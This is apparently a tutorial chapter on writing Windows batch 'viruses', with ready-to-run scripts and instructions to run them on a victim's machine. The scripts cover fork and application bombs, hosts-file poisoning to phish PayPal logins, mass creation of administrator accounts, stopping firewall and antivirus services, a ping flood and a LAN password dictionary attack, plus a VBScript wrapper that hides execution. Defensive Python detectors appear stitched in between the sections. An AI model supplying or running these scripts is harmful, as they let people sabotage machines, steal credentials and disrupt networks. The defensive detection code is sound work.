There were a few things left uncovered in most batch programs, and that is nothing but the dark side of batch. Batch programming offers its programmers a way to create their own custom viruses just by misusing the way commands work, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark side of batch by learning how commands can be misused to create batch viruses.
Folder Replicator Virus:
Here is a simple batch virus of only 6 lines; it has the tendency to replicate itself again and again and keeps on creating a folder with the same name, until the user stops it.
1. Just open up a notepad, copy and paste the below code
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop
2. Save it as a batch file with the extension .bat. Before doing that, you have to modify the code by changing the place where it says ‘username’ and replacing it with the currently logged-in username.
3. Then run it on the victim’s computer to infect it.
4. Anyhow, it doesn’t cause much harm, but it replicates a folder inside a folder and goes on.
One more thing you have to notice is that this will create a directory inside another directory with the same name, so it doesn’t look like a mess, since everything resides inside one main directory; moreover, deleting the root directory will purge all the clumsy things done by this piece of code.
DNS poisoning:
Batch files have the tendency to modify how host names are resolved by editing the hosts file that resides at ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it takes you to some malicious website instead of landing you on the legitimate one. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then stealing your credentials.
@echo off
echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit
This program creates new entries in the hosts file, so that whenever a user attempts to go to www.google.com, he will be redirected to another host that has the IP address 10.199.64.66; likewise, if the user attempts to log in to his PayPal account by typing www.paypal.com, he will be redirected to an external bogus website that has the IP address 10.199.64.67, where if the user unknowingly enters his credentials, they go into the hacker’s database and he can use them for several other purposes.
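A defender’s counterpart to the script above is to audit the hosts file for exactly this kind of entry. The following is an added example (not code from the original post): it parses hosts-file text in the format Windows uses and flags any watched domain that has been pointed at a non-loopback address. The sample content, the watched-domain list and the path comment are assumptions for the demonstration; note that on a real system the file is named `hosts` with no extension.

```python
"""Audit a Windows hosts file for entries that hijack well-known domains.

Added example, not from the original post. It parses hosts-file text in the
format Windows uses (IP, whitespace, one or more hostnames, optional '#'
comment) and flags any line that points a watched domain at an address other
than loopback. The sample content is constructed to mirror the entries the
post appends; the watched-domain list and the file path are assumptions.
"""
import ipaddress

# Domains a defender would expect never to appear in a hosts file (assumed list).
WATCHED_DOMAINS = {"www.google.com", "www.paypal.com"}

# Constructed sample: a default-looking hosts file plus the two lines the
# post's script appends.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost
127.0.0.1 dev.local   # local development box
10.199.64.66 www.google.com
10.199.64.67 www.paypal.com
"""


def parse_hosts(text):
    """Yield (ip, hostname, line_number) for every mapping in a hosts file."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                           # malformed line, not a mapping
        for host in fields[1:]:
            yield ip, host.lower(), lineno


def find_hijacks(text, watched=WATCHED_DOMAINS):
    """Return [(hostname, ip_string, line_number)] for suspicious mappings.

    A mapping is suspicious when a watched domain resolves to anything that is
    not a loopback address; loopback entries are how hosts files are commonly
    used to *block* sites, so those are not reported.
    """
    hits = []
    for ip, host, lineno in parse_hosts(text):
        if host in watched and not ip.is_loopback:
            hits.append((host, str(ip), lineno))
    return hits


if __name__ == "__main__":
    # On a live system read the real file instead of the sample; the Windows
    # hosts file has no extension: %SystemRoot%\System32\drivers\etc\hosts
    for host, ip, lineno in find_hijacks(SAMPLE_HOSTS):
        print(f"line {lineno}: {host} -> {ip} (non-loopback override)")
```

Run against the real file, this reports the two appended lines by line number; a scheduled comparison of the file’s hash against a known-good copy catches the change even for domains not on the watched list.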
Fork Bombing:
Most of us have heard of ‘fork()’, which is used to create a child process; likewise, fork bombing is nothing but a program calling itself again and again in an infinite loop, making the system crash by popping up hundreds of windows on the screen.
@echo off
:loop
Explorer
Call fork.bat
Goto loop
Copy the above program, paste it into a notepad file and save it as ‘fork.bat’. The explorer command will open up the ‘documents’ directory, and it is given inside a loop; then the same batch file is called again, which in turn opens up multiple documents windows in a loop. Likewise it goes on by calling the program itself again and again until the system crashes or hangs up.
Application Bomber:
Application bomber is a superset of window bomber; it has a close relation to the above given fork bomber program, but in this ‘application bomber’ we don’t call the program by its own name (simply known as fork); instead we are going to open up applications continuously using a loop.
@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop
When the above given batch program is executed, it will open up the following applications, namely notepad, Word, Microsoft Paint, WordPad, the command prompt, My Documents, the control panel and the calculator, in an infinite loop, causing the system to collapse; as a result the system simply crashes or reboots. Just imagine the same using the fork concept; oops! It will make the system crash immediately.
Msg Annoyer:
Message annoyer is a batch program that uses the same concept as above, but interacts with the user, annoying and irritating them by popping up message boxes containing some messages.
@echo off
:annoy
msg * Hi there!
msg * How u doin ?
msg * Are you fine ?
msg * Never mind about me....
msg * I am not here to annoy you....
msg * I am caring for you.....
msg * start counting from 1 to 5, i Will be outta this place.....
msg * 1
msg * 2
msg * 3
msg * 4
msg * 5
goto annoy
This program will pop up a small message box, as shown below, containing the text mentioned in the program given above. This message box will keep popping up in an endless loop, which really annoys the person sitting in front of the computer. Even these small popup windows may crash the computer, if they overload the memory.
User Flooder:
The ‘user flooder’ program will create a number of user accounts named with random numbers and assign administrator rights to them by itself; moreover, the passwords set for those user accounts are also random numbers.
@echo off
:usrflood
set usr=%random%
net users %usr% %random% /add
net localgroup administrators %usr% /add
goto usrflood
Since we have already learned about environment variables, ‘%random%’ is an environment variable that generates a random positive integer. We have manually set a variable named ‘usr’ to hold the random number generated by %random%; then a new user account is created with the generated number as the account name and assigned a random password, then assigned administrator rights, and this process is repeated in an infinite loop, so it will create more than 50 user accounts in less than a minute. This will surely degrade the computer’s performance, and the user will take a long, long time to delete the user accounts; sometimes they will simply format their hard drives.
The best way to delete the user accounts is the same way we have created them, and it is very simple, so I am going to make this a challenge for those who take the chance to experiment with this: get rid of those user accounts with a simple batch program. You may mail me the batch file required to solve this issue along with the steps required to do so; here is my mail id: info.prem4u[at]gmail[dot]com.
Matrix Folder flooder:
The following piece of code is going to help flood your computer with junk folders. This program has the tendency to create more than 3000 folders in less than a minute.
@echo off
:loop
mkdir %random%
goto loop
Here I have enclosed the screenshot taken while I was testing this code on my computer.
Service Disabler:
The following piece of code is used for stopping some critical Windows services.
@echo off
net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes
exit
This program, when executed, will stop the ‘Windows Firewall’ service that is required to block unwanted datagrams coming from the internet; the ‘Windows Update’ service that is required to update Windows patches and so on; the ‘Workstation’ service that is required for the computer to establish a peer-to-peer connection; the ‘DHCP Client’ service that is required to register an available IP address from the DHCP server; the ‘DNS Client’ service that is required to resolve an FQDN (Fully Qualified Domain Name) into its equivalent IP address; the ‘Print Spooler’ service that is required to load the document to be printed into the spool; and then the ‘Themes’ service that is required to offer themes and other graphical appearance.
Likewise you may stop any of the services; even the anti-virus service that offers protection from malware can be stopped in this way.
So when these services get stopped, it almost becomes impossible for the machine to offer the services they are supposed to, hence the user has to manually enable and start these services again.
Broadcast Bomber:
The ‘broadcast bomber’ will broadcast messages infinitely to all the computers connected to this computer, if it is in a network. Like the ‘msg flooder’ program that we have seen already, this helps people annoy multiple people sitting and working in front of the various other computers connected to the same network.
@echo off
:netannoy
net send * Hi there!
net send * How u doin ?
net send * Are you fine ?
net send * Never mind about me....
net send * I am not here to annoy you....
net send * I am caring for you.....
net send * start counting from 1 to 5, i Will be outta this place.....
net send * 1
net send * 2
net send * 3
net send * 4
net send * 5
goto netannoy
When the above piece of code gets executed, it will display pop-up windows like the one below on all the computers connected to the same network, thereby annoying everyone who uses the entire network.
Keystroke Re-mapper:
The following piece of batch program helps re-map keystrokes by changing the ‘Scancode Map’ entry in the registry. The code that I have enclosed here changes the key from A to B, so that if any user presses the ‘a’ key on the keyboard he will get ‘b’ displayed on the screen; likewise you may map any keys.
@echo off
reg add "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 00000000000000000200000030001e0000000000
exit
If you want to create a new batch file for remapping other keys, you have to refer to the ASCII codes pre-assigned to each key, which you can download from http://tinyurl.com/8ua4gk.
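Rather than apply a Scancode Map, a defender usually wants to read one back and see what it does, since the raw hex tells you nothing at a glance. The following is an added example (not code from the original post) that decodes the REG_BINARY value using the layout Microsoft documents for this key: two reserved DWORDs, a DWORD count of entries including the terminating null entry, then one little-endian DWORD per mapping whose high word is the original scan code and whose low word is the replacement. The hex string is the one from the reg add command above; the short scan-code name table is an assumption added for readability.

```python
"""Decode a 'Scancode Map' REG_BINARY value so the remapping it applies can
be audited instead of applied.

Added example, not from the original post. Layout of the value (documented
by Microsoft): two reserved DWORDs, a DWORD count of mapping entries
including the terminating null entry, then one DWORD per mapping whose
high word is the original scan code and whose low word is the scan code
it is replaced with, followed by a null DWORD. All DWORDs are little-endian.
The name table covers only a few keys and is an assumption for readability.
"""
import struct

# Partial PS/2 set 1 scan codes for labelling (assumed subset); anything
# else prints as a bare hex value.
SCANCODE_NAMES = {0x1E: "A", 0x30: "B", 0x1D: "Left Ctrl", 0x3A: "Caps Lock",
                  0x00: "(disabled)"}

# Constructed sample: the exact hex string from the post's reg add command.
SAMPLE_HEX = "00000000000000000200000030001e0000000000"


def decode_scancode_map(hex_value):
    """Return a list of (original_scancode, new_scancode) pairs.

    Raises ValueError when the blob is too short, the count disagrees with
    the number of entries, or the terminator is missing.
    """
    data = bytes.fromhex(hex_value)
    if len(data) < 16 or len(data) % 4:
        raise ValueError("Scancode Map must be at least 16 bytes, in DWORDs")
    dwords = struct.unpack("<%dI" % (len(data) // 4), data)
    _version, _flags, count = dwords[0], dwords[1], dwords[2]
    entries = dwords[3:]
    if count != len(entries):
        raise ValueError(f"count field {count} but {len(entries)} entries present")
    if entries[-1] != 0:
        raise ValueError("missing null terminator entry")
    mappings = []
    for dword in entries[:-1]:
        original = dword >> 16           # high word: key physically pressed
        replacement = dword & 0xFFFF     # low word: scan code delivered instead
        mappings.append((original, replacement))
    return mappings


def describe(hex_value):
    """Human-readable lines, e.g. 'A (0x1e) -> B (0x30)'."""
    def name(code):
        return f"{SCANCODE_NAMES.get(code, 'scan code')} (0x{code:02x})"
    return [f"{name(o)} -> {name(n)}" for o, n in decode_scancode_map(hex_value)]


if __name__ == "__main__":
    # On a live host, export the value with:
    #   reg query "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map"
    # and feed the hex string shown to describe().
    for line in describe(SAMPLE_HEX):
        print(line)
```

For the post’s value the decoder reports a single mapping, A to B, which matches the text; a value whose count field disagrees with its length, or that lacks the null terminator, is rejected rather than guessed at. Because this key is read at logon, a monitoring rule on writes to it is a cheap way to catch the technique.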
Ext_changer:
This virus program is created by misusing the assoc command. The ‘assoc’ command is used for associating an extension with the appropriate file type; for example, .txt extensions are supposed to be associated with text files and so on.
@echo off
title Ext_changer
color a
Rem This Virus file replaces the actual file extensions with the given extensions
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit
Here we are associating the native file extensions with some other type of file, which makes the programs unable to open or display the files in the right format.
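The change above is easy to detect because `assoc` with no arguments prints every association as one `ext=filetype` line. The following is an added example (not code from the original post) that parses that output, compares it with a baseline of expected associations, and prints the `assoc` commands that would restore the baseline for review. The baseline values and the sample output are assumptions constructed for the demonstration; a real baseline should be captured from a known-good machine.

```python
"""Compare the output of the 'assoc' command against a baseline of expected
extension -> file type mappings and report any extension that has been
re-associated, which is what the post's Ext_changer script does.

Added example, not from the original post. The baseline values are the
defaults commonly seen on Windows but are an assumption here; the sample
'assoc' output is constructed to show the post's changes.
"""

# Expected mappings (assumed baseline; a real one should be captured from a
# known-good machine with `assoc > baseline.txt`).
BASELINE = {
    ".txt": "txtfile",
    ".exe": "exefile",
    ".jpeg": "jpegfile",
    ".png": "pngfile",
    ".mpeg": "mpegfile",
    ".sys": "sysfile",
    ".bat": "batfile",
}

# Constructed sample of `assoc` output after the Ext_changer script ran.
SAMPLE_ASSOC = """\
.bat=batfile
.exe=htmlfile
.jpeg=avifile
.mpeg=txtfile
.png=mpegfile
.sys=regfile
.txt=jpegfile
.zip=CompressedFolder
"""


def parse_assoc(text):
    """Parse 'ext=filetype' lines into a dict; extensions are lower-cased.

    `assoc` prints one association per line and nothing else, so any line
    without '=' is ignored rather than treated as an error.
    """
    mapping = {}
    for line in text.splitlines():
        line = line.strip()
        if "=" not in line:
            continue
        ext, ftype = line.split("=", 1)
        mapping[ext.lower()] = ftype.strip()
    return mapping


def find_drift(assoc_text, baseline=BASELINE):
    """Return {ext: (expected, actual)} for every baseline extension whose
    current association differs; an extension missing from the output shows
    actual=None (assoc prints nothing for an unregistered extension)."""
    current = parse_assoc(assoc_text)
    drift = {}
    for ext, expected in baseline.items():
        actual = current.get(ext)
        if actual != expected:
            drift[ext] = (expected, actual)
    return drift


def repair_commands(drift):
    """Build the assoc commands that restore the baseline, for review before
    running them in an elevated prompt (assoc writes HKCR, so it needs admin)."""
    return [f"assoc {ext}={expected}" for ext, (expected, _) in sorted(drift.items())]


if __name__ == "__main__":
    drift = find_drift(SAMPLE_ASSOC)
    for ext, (expected, actual) in sorted(drift.items()):
        print(f"{ext}: expected {expected}, found {actual}")
    print("\n".join(repair_commands(drift)))
```

On the sample this reports the six extensions the script rewrote and leaves `.bat` alone; the `.exe` drift is the one to treat as urgent, since a wrong association for executables affects far more than file previews.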
Packet flooder:
Since we have already learned about the ‘ping of death’ and ‘DoS attacks’ in the earlier chapters, we are creating this program to slow down a remote computer connected to our network. This can be done by continuously pinging the remote host with the packet length set to 65,500K. At the receiving end, the remote computer receives mushrooms of packets of larger size, and if it goes on for some time, the memory on the remote system automatically overloads and finally the remote system will crash.
@echo off
:flood
ping -l 65500 -t 10.199.64.66
start flooder.bat
goto flood
I am going to save this file as flooder.bat. Since I have used the fork bombing technique, it will open up a lot of command windows on your screen too, and there are chances for your computer to crash too.
In the above program I have used my neighbouring computer 10.199.64.66 as my victim; I tried running this program for just 3 minutes and I found the remote system restarting. Until then I had turned off my monitor, because my screen too was flooded with command prompt windows. You may replace the IP address 10.199.64.66 with either your networked computer’s hostname or IP address, if you want to check it by yourself.
LAN Remote user – Dictionary Attack:
Use this batch file to launch a dictionary attack and find the Windows logon credentials in a LAN. You need a dictionary text file to proceed further and launch this attack successfully. Just follow the steps below,
1. Open up a Notepad file.
2. Copy and paste the below code and save it as a batch file with the .bat extension.
@echo off
Title LAN Dictionary Attack Launcher
Color 0a
if "%1"=="" goto fin
if "%2"=="" goto fin
del logfile.txt
FOR /F "tokens=1" %%i in (passlist.txt)
do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2
2>>logfile.txt && ^
echo %time% %date% >> outfile.txt
&& ^
echo \\%1\ipc$ acct: %2 pass: %%i
>> output.txt && goto end
:fin
echo *****Done*****
3. Make sure that you have a dictionary password text file in the same location where you are going to execute this program. (The name should be passlist.txt.)
4. Now go to the command prompt and execute this program from there, along with the target computer’s IP address or hostname and a valid username. The syntax should be like this,…
C:\>LANbrute.bat 192.169.21.02 Administrator
Where,
LANbrute.bat – This is the name of the batch file that resides in the C drive.
192.169.21.02 – IP address of the target computer.
Administrator – Victim account that you want to crack.
5. This program will start launching a dictionary attack against the administrator account on the machine 192.168.21.02, using the passwords from the file passlist.txt, and will not stop until it finds the right match.
6. If the right password is found, then it will save it in a text file named ‘output.txt’ in the same directory.
Credits to the folks from Irongeek, because this is an idea of theirs; after a little messing with it, I have included it in this book.
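Both the user flooder earlier in this chapter and the dictionary attack above leave a loud trail in the Windows Security log: a burst of event 4720 (user account created) and 4732 (member added to a local group) from one account, or a burst of 4625 (failed logon) from one source against one target. The following is an added example (not code from the original post or from Irongeek) of a sliding-window burst detector over such events. The log lines are constructed in a simplified `time id field=value` form rather than real EVTX/XML, and the field names, thresholds and window length are assumptions for the demonstration.

```python
"""Burst detector for Windows Security events that the scripts in this post
would generate in quantity: 4720 (user account created), 4732 (member added
to a security-enabled local group) and 4625 (failed logon).

Added example, not from the original post. The log lines are constructed in a
simplified 'time id field=value ...' form rather than real EVTX/XML; the field
names, thresholds and window length are assumptions for the demonstration.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Per event id: (fields that identify the actor, max events per window).
# A normal admin rarely creates more than a handful of accounts, or sees many
# failed logons from one source, within a minute (thresholds are assumed).
RULES = {
    "4720": (("subject",), 5),            # accounts created by one subject
    "4732": (("subject", "group"), 5),    # additions to one group by one subject
    "4625": (("source", "target"), 10),   # failed logons from one host to one account
}
WINDOW = timedelta(seconds=60)

# Constructed sample: one benign failed logon, then a user-flooder run
# (paired 4720/4732 events from 'alice'), then a dictionary attack
# (eleven 4625 events from one host against 'Administrator').
SAMPLE_LOG = """\
2024-01-10T09:00:01 4625 source=10.0.0.7 target=bob
2024-01-10T09:00:05 4720 subject=alice target=12345
2024-01-10T09:00:05 4732 subject=alice group=Administrators target=12345
2024-01-10T09:00:06 4720 subject=alice target=6789
2024-01-10T09:00:06 4732 subject=alice group=Administrators target=6789
2024-01-10T09:00:07 4720 subject=alice target=2221
2024-01-10T09:00:07 4732 subject=alice group=Administrators target=2221
2024-01-10T09:00:08 4720 subject=alice target=30999
2024-01-10T09:00:08 4732 subject=alice group=Administrators target=30999
2024-01-10T09:00:09 4720 subject=alice target=18
2024-01-10T09:00:09 4732 subject=alice group=Administrators target=18
2024-01-10T09:00:10 4720 subject=alice target=4410
2024-01-10T09:00:10 4732 subject=alice group=Administrators target=4410
""" + "".join(
    f"2024-01-10T09:01:{i:02d} 4625 source=10.199.64.66 target=Administrator\n"
    for i in range(11)
)


def parse_event(line):
    """Split 'timestamp id k=v k=v ...' into (datetime, id, {k: v})."""
    stamp, event_id, *pairs = line.split()
    fields = dict(pair.split("=", 1) for pair in pairs)
    return datetime.fromisoformat(stamp), event_id, fields


def detect_bursts(log_text, rules=RULES, window=WINDOW):
    """Return alerts as (event_id, key_tuple, count, time_of_alert).

    Events are bucketed by (event id, actor key); timestamps older than the
    window are dropped from the front of each bucket, and an alert fires the
    moment a bucket exceeds its limit. The bucket is then cleared so one
    burst yields one alert instead of one per subsequent event.
    """
    history = defaultdict(deque)
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        when, event_id, fields = parse_event(line)
        if event_id not in rules:
            continue
        key_fields, limit = rules[event_id]
        key = tuple(fields.get(f, "?") for f in key_fields)
        bucket = history[(event_id, key)]
        bucket.append(when)
        while bucket and when - bucket[0] > window:
            bucket.popleft()
        if len(bucket) > limit:
            alerts.append((event_id, key, len(bucket), when))
            bucket.clear()
    return alerts


if __name__ == "__main__":
    for event_id, key, count, when in detect_bursts(SAMPLE_LOG):
        print(f"{when.isoformat()} event {event_id} x{count} from {key}")
```

On the sample this yields three alerts: the account-creation burst, the matching Administrators-group burst, and the failed-logon burst from 10.199.64.66, while bob’s single failed logon is ignored. The 4732 rule is the one worth keeping even if the others are too noisy, since additions to Administrators are rare on a healthy host.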
Stealthy Virus using Vbscript:
As we have seen in the previous chapters, all those programs, at the time of execution, open up a command window, thereby revealing that they were programmed using batch file programming. In order to hide the programs at the time of execution, we may use a VBScript to stealth our program, and it will be more useful while constructing and executing a virus on the victim’s computer, so that it remains unnoticed.
Set objShell = CreateObject("WScript.Shell")
strCommand = "C:\yourfile.bat"
objShell.Run strCommand, vbHide, TRUE
Copy the above code into a notepad file, replace ‘C:\yourfile.bat’ with the actual name and location of the batch file that you have created, and then save this file with a .vbs extension. Now you may execute this VBScript file to run the batch file too, so there is no need for you to execute the batch file separately. Now the batch is still running in the background and remains hidden.
The only way to end the process is to open the task manager and kill the process that says Wscript.
[Disclaimer Notification: All the information given in this post is only for educational means.]